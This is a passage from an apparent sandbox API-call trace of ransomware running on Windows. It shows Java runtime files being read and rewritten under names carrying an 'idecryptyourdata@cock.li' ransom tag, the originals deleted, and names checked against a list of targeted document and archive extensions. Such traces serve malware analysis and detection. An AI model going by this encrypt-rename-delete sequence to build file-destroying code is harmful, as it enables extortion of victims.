hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.768] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.768] GetLastError () returned 0x0 [0197.768] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x4040, lpOverlapped=0x0) returned 1 [0197.800] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x4050, lpOverlapped=0x0) returned 1 [0197.801] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.801] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xea, lpOverlapped=0x0) returned 1 [0197.801] SetEndOfFile (hFile=0x35c) returned 1 [0197.814] CloseHandle (hObject=0x35c) returned 1 [0197.814] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.814] SetEndOfFile (hFile=0x3a8) returned 1 [0197.816] CloseHandle (hObject=0x3a8) returned 1 [0197.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.816] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\keytool.exe")) returned 1 [0197.816] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.816] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.816] lstrlenW (lpString=".doc") returned 4 [0197.816] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.816] lstrlenW (lpString=".docx") returned 5 [0197.816] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0197.816] lstrlenW (lpString=".pdf") returned 4 [0197.817] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.817] lstrlenW (lpString=".xls") returned 4 [0197.817] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.817] lstrlenW (lpString=".xlsx") returned 5 [0197.817] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0197.817] lstrlenW (lpString=".ppt") returned 4 [0197.817] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.817] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.817] lstrlenW (lpString=".zip") returned 4 [0197.817] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.817] lstrlenW (lpString=".rar") returned 4 [0197.817] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.817] lstrlenW (lpString=".bz2") returned 4 [0197.817] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.817] lstrlenW (lpString=".7z") returned 3 [0197.817] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.817] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.817] lstrlenW (lpString=".dbf") returned 4 [0197.817] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.817] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.817] lstrlenW (lpString=".1cd") returned 4 [0197.817] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.817] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.817] lstrlenW (lpString=".jpg") returned 4 [0197.817] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.817] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.817] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.817] lstrlenW (lpString=".doc") returned 4 [0197.817] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.818] lstrlenW (lpString=".docx") returned 5 [0197.818] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0197.818] lstrlenW (lpString=".pdf") returned 4 [0197.818] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.818] lstrlenW (lpString=".xls") returned 4 [0197.818] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.818] lstrlenW (lpString=".xlsx") returned 5 [0197.818] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0197.818] lstrlenW (lpString=".ppt") returned 4 [0197.818] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.818] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.818] lstrlenW (lpString=".zip") returned 4 [0197.818] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.818] lstrlenW (lpString=".rar") returned 4 [0197.818] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.818] lstrlenW (lpString=".bz2") returned 4 [0197.818] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.818] lstrlenW (lpString=".7z") returned 3 [0197.818] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.818] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.818] lstrlenW (lpString=".dbf") returned 4 [0197.818] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.818] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.818] lstrlenW (lpString=".1cd") returned 4 [0197.818] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.818] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\keytool.exe") returned 50 [0197.818] lstrlenW (lpString=".jpg") returned 4 [0197.818] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.819] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0197.819] lstrlenW (lpString="klist.exe") returned 9 [0197.819] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.826] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=16448) returned 1 [0197.826] CloseHandle (hObject=0x3a8) returned 1 [0197.826] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe")) returned 0x20 [0197.826] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.826] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.826] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.826] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.827] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.827] GetLastError () returned 0x0 [0197.827] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x4040, lpOverlapped=0x0) returned 1 [0197.865] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x4050, lpOverlapped=0x0) returned 1 [0197.866] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.866] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe6, lpOverlapped=0x0) returned 1 [0197.866] SetEndOfFile (hFile=0x35c) returned 1 [0197.866] CloseHandle (hObject=0x35c) returned 1 [0197.866] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.866] SetEndOfFile (hFile=0x3a8) returned 1 [0197.867] CloseHandle (hObject=0x3a8) returned 1 [0197.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.868] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe")) returned 1 [0197.868] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.868] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.868] lstrlenW (lpString=".doc") returned 4 [0197.868] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.868] lstrlenW (lpString=".docx") returned 5 [0197.868] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0197.868] lstrlenW (lpString=".pdf") returned 4 [0197.869] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.869] lstrlenW (lpString=".xls") returned 4 [0197.869] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.869] lstrlenW (lpString=".xlsx") returned 5 [0197.869] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0197.869] lstrlenW (lpString=".ppt") returned 4 [0197.869] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.869] lstrlenW (lpString=".zip") returned 4 [0197.869] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.869] lstrlenW (lpString=".rar") returned 4 [0197.869] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.869] lstrlenW (lpString=".bz2") returned 4 [0197.869] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.869] lstrlenW (lpString=".7z") returned 3 [0197.869] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.869] lstrlenW (lpString=".dbf") returned 4 [0197.869] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.869] lstrlenW (lpString=".1cd") returned 4 [0197.869] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.869] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.869] lstrlenW (lpString=".jpg") returned 4 [0197.869] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.870] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.870] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.870] lstrlenW (lpString=".doc") returned 4 [0197.870] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.870] lstrlenW (lpString=".docx") returned 5 [0197.870] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0197.870] lstrlenW (lpString=".pdf") returned 4 [0197.870] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.870] lstrlenW (lpString=".xls") returned 4 [0197.870] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.870] lstrlenW (lpString=".xlsx") returned 5 [0197.870] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0197.870] lstrlenW (lpString=".ppt") returned 4 [0197.870] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.870] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.870] lstrlenW (lpString=".zip") returned 4 [0197.870] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.870] lstrlenW (lpString=".rar") returned 4 [0197.870] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.870] lstrlenW (lpString=".bz2") returned 4 [0197.870] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.870] lstrlenW (lpString=".7z") returned 3 [0197.870] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.870] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.870] lstrlenW (lpString=".dbf") returned 4 [0197.870] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.870] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.871] lstrlenW (lpString=".1cd") returned 4 [0197.871] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.871] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 48 [0197.871] lstrlenW (lpString=".jpg") returned 4 [0197.871] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.871] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0197.871] lstrlenW (lpString="ktab.exe") returned 8 [0197.871] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.872] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=16448) returned 1 [0197.872] CloseHandle (hObject=0x3a8) returned 1 [0197.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe")) returned 0x20 [0197.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.872] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.872] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.872] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.872] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.873] GetLastError () returned 0x0 [0197.873] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x4040, lpOverlapped=0x0) returned 1 [0197.898] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x4050, lpOverlapped=0x0) returned 1 [0197.899] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.899] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xe4, lpOverlapped=0x0) returned 1 [0197.900] SetEndOfFile (hFile=0x35c) returned 1 [0197.900] CloseHandle (hObject=0x35c) returned 1 [0197.900] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.900] SetEndOfFile (hFile=0x3a8) returned 1 [0197.901] CloseHandle (hObject=0x3a8) returned 1 [0197.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0197.901] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe")) returned 1 [0197.902] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.902] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.902] lstrlenW (lpString=".doc") returned 4 [0197.902] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.902] lstrlenW (lpString=".docx") returned 5 [0197.902] lstrcmpiW (lpString1=".docx", lpString2="b.exe") returned -1 [0197.902] lstrlenW (lpString=".pdf") returned 4 [0197.902] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.902] lstrlenW (lpString=".xls") returned 4 [0197.902] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.902] lstrlenW (lpString=".xlsx") returned 5 [0197.902] lstrcmpiW (lpString1=".xlsx", lpString2="b.exe") returned -1 [0197.902] lstrlenW (lpString=".ppt") returned 4 [0197.902] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.902] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.902] lstrlenW (lpString=".zip") returned 4 [0197.902] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.902] lstrlenW (lpString=".rar") returned 4 [0197.902] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.902] lstrlenW (lpString=".bz2") returned 4 [0197.902] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.902] lstrlenW (lpString=".7z") returned 3 [0197.902] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.902] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.902] lstrlenW (lpString=".dbf") returned 4 [0197.903] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.903] lstrlenW (lpString=".1cd") returned 4 [0197.903] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.903] lstrlenW (lpString=".jpg") returned 4 [0197.903] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.903] lstrlenW (lpString=".doc") returned 4 [0197.903] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0197.903] lstrlenW (lpString=".docx") returned 5 [0197.903] lstrcmpiW (lpString1=".docx", lpString2="b.exe") returned -1 [0197.903] lstrlenW (lpString=".pdf") returned 4 [0197.903] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0197.903] lstrlenW (lpString=".xls") returned 4 [0197.903] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0197.903] lstrlenW (lpString=".xlsx") returned 5 [0197.903] lstrcmpiW (lpString1=".xlsx", lpString2="b.exe") returned -1 [0197.903] lstrlenW (lpString=".ppt") returned 4 [0197.903] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0197.903] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.903] lstrlenW (lpString=".zip") returned 4 [0197.903] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0197.903] lstrlenW (lpString=".rar") returned 4 [0197.903] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0197.903] lstrlenW (lpString=".bz2") returned 4 [0197.904] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0197.904] lstrlenW (lpString=".7z") returned 3 [0197.904] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0197.904] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.904] lstrlenW (lpString=".dbf") returned 4 [0197.904] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0197.904] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.904] lstrlenW (lpString=".1cd") returned 4 [0197.904] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0197.904] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 47 [0197.904] lstrlenW (lpString=".jpg") returned 4 [0197.904] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0197.904] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0197.904] lstrlenW (lpString="management.dll") returned 14 [0197.904] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.905] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=36928) returned 1 [0197.905] CloseHandle (hObject=0x3a8) returned 1 [0197.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll")) returned 0x20 [0197.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.905] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0197.905] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.906] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.906] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\management.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\management.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0197.906] GetLastError () returned 0x0 [0197.906] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x9040, lpOverlapped=0x0) returned 1 [0197.942] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x9050, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x9050, lpOverlapped=0x0) returned 1 [0197.943] ReadFile (in: hFile=0x3a8, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.943] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf0, lpOverlapped=0x0) returned 1 [0197.943] SetEndOfFile (hFile=0x35c) returned 1 [0197.943] CloseHandle (hObject=0x35c) returned 1 [0197.944] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.944] SetEndOfFile (hFile=0x3a8) returned 1 [0197.945] CloseHandle 